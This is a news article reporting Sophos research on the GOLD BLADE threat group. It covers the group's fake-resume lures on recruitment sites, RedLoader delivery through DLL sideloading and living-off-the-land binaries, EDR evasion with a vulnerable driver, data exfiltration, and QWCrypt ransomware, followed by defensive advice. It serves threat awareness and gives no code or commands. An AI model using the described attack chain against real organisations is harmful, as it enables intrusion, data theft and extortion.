Evolving fake resume campaign leads to RedLoader, ransomware infection

An evolving fake resume scheme conducted by the threat group GOLD BLADE spreads RedLoader malware and QWCrypt ransomware, pilfering data in targeted campaigns, Sophos reported Friday.

The company analyzed 40 attacks between February 2024 and August 2025 suspected to be connected to GOLD BLADE, which is also known as RedCurl, RedWolf and Earth Kapre.

Traditionally, GOLD BLADE has gained initial access through social engineering via fake resumes, cover letters or curricula vitae (CVs), posing as job applicants in emails to hiring managers at targeted companies.

However, in recent campaigns, GOLD BLADE has shifted from emails to recruitment sites, uploading lure documents directly to these sites to avoid being flagged by email security systems. Targeted sites include Indeed, JazzHR and ADP WorkforceNow.

The initial lure documents are PDFs that contain links leading to the next stage download. In some cases, the PDFs imitate a Safe Resume Share Service page displaying an error, directing the victim to click a link to view the resume.

The next stage download varies between different iterations of the campaign observed between September 2024 and July 2025, consisting of a ZIP archive containing either a .lnk disguised as a resume PDF or an .iso or .img file.

Related reading:

In 2024, the .lnk file would leverage rundll32.exe to retrieve the RedLoader malware dynamic link library (DLL) from an external WebDAV server hosted under a Cloudflare Workers domain and execute it in memory, according to Sophos.

In more recent campaigns, the .lnk file would instead retrieve a renamed copy of the legitimate Adobe utility ADNotificationManager.exe from the WebDAV server and use it to sideload the RedLoader DLL for an added layer of stealth.

The .iso/.img files, used in attacks in March and April 2025, also leveraged sideloading via ADNotificationManager.exe, with the .iso/.img being automatically mounted as a virtual drive containing the necessary DLL and executable.

Once the RedLoader DLL is executed, it loads a fake Indeed login page to distract the user and connects to an attacker command-and-control (C2) server in preparation for the next stage of deployment. A scheduled task is created to download and execute the next stage, with earlier attacks using the living-off-the-land (LOTL) binary pcalua.exe (Program Compatibility Assistant) to invoke rundll32.exe and deliver it as a DLL.

In more recent attacks, the scheduled task launches both pcalua.exe and conhost.exe (Console Window Host) with a -headless argument to quietly deliver the second-stage payload as an executable in the background.

The second stage connects to a different C2 server and retrieves and executes the final RedLoader payload using another scheduled task. In September 2024 and March 2025 attacks, this task downloads RedLoader as a DLL along with a .dat file and executes it either by running a rundll32.exe command directly or via pcalua.exe.

In April and Jul 2025, the payload was instead downloaded as an executable, along with its .dat file and a renamed version of 7-Zip, and executed via pcalua.exe.

After full installation, RedLoader connects to another separate C2 server and runs command to gather information including host details, disks, processes and installed antivirus products, collecting this information into encrypted and password-protected 7-Zip archives to exfiltrate to an attacker-controlled WebDAV server, Sophos wrote.   

GOLD BLADE leverages the open-source reverse proxy RPivot to facilitate C2 communications uses a customized version of the Terminator endpoint detection and response (EDR) killer tool to evade defenses. In the recent campaign, a vulnerable Zemana AntiMalware driver was leveraged in conjunction with Terminator to attempt to disable EDR solutions via Bring Your Own Vulnerable Driver (BYOVD) tactics.

QWCrypt ransomware is a custom ransomware used by GOLD BLADE that was deployed to attempt to extort some of the victims affected in RedLoader attacks. In an April attack, the ransomware was delivered in an encrypted 7-Zip archive, with local admin accounts and impacket remote execution leveraged to run the launcher script that triggered the ransomware deployment, Sophos said.

The ransomware files are tailored to each target, with the file names including a victim-specific ID. Files encrypted by the ransomware are appended with the extension .qwCrypt. The QWCrypt ransom note threatens to leak the encrypted files and provides a Proton Mail email address as a means of contacting the attacker.

GOLD BLADE a hack-for-hire operation

Sophos noted that GOLD BLADE appears to operate as a “hack-for-hire” service, conducting targeted rather than opportunistic attacks and primarily focusing on stealing sensitive information including business-related files, emails and credentials. The use of QWCrypt ransomware adds an additional financial incentive for intrusions already conducted on behalf of GOLD BLADE’s clients.

GOLD BLADE’s recent attacks mostly targeted companies in North America, with 80% targeting Canadian businesses and 14% targeting U.S. organizations.

In order to defend against GOLD BLADE attacks, Sophos recommends organizations secure their hiring process, such as by routing file attachments from recruitment platforms through their email and security gateways prior to opening these files for review.

Sophos also emphasizes the importance of comprehensive logging and centrally managed protection and monitoring for all endpoints across an organization and recommends the use of managed detection and response (MDR) solutions to ensure full coverage.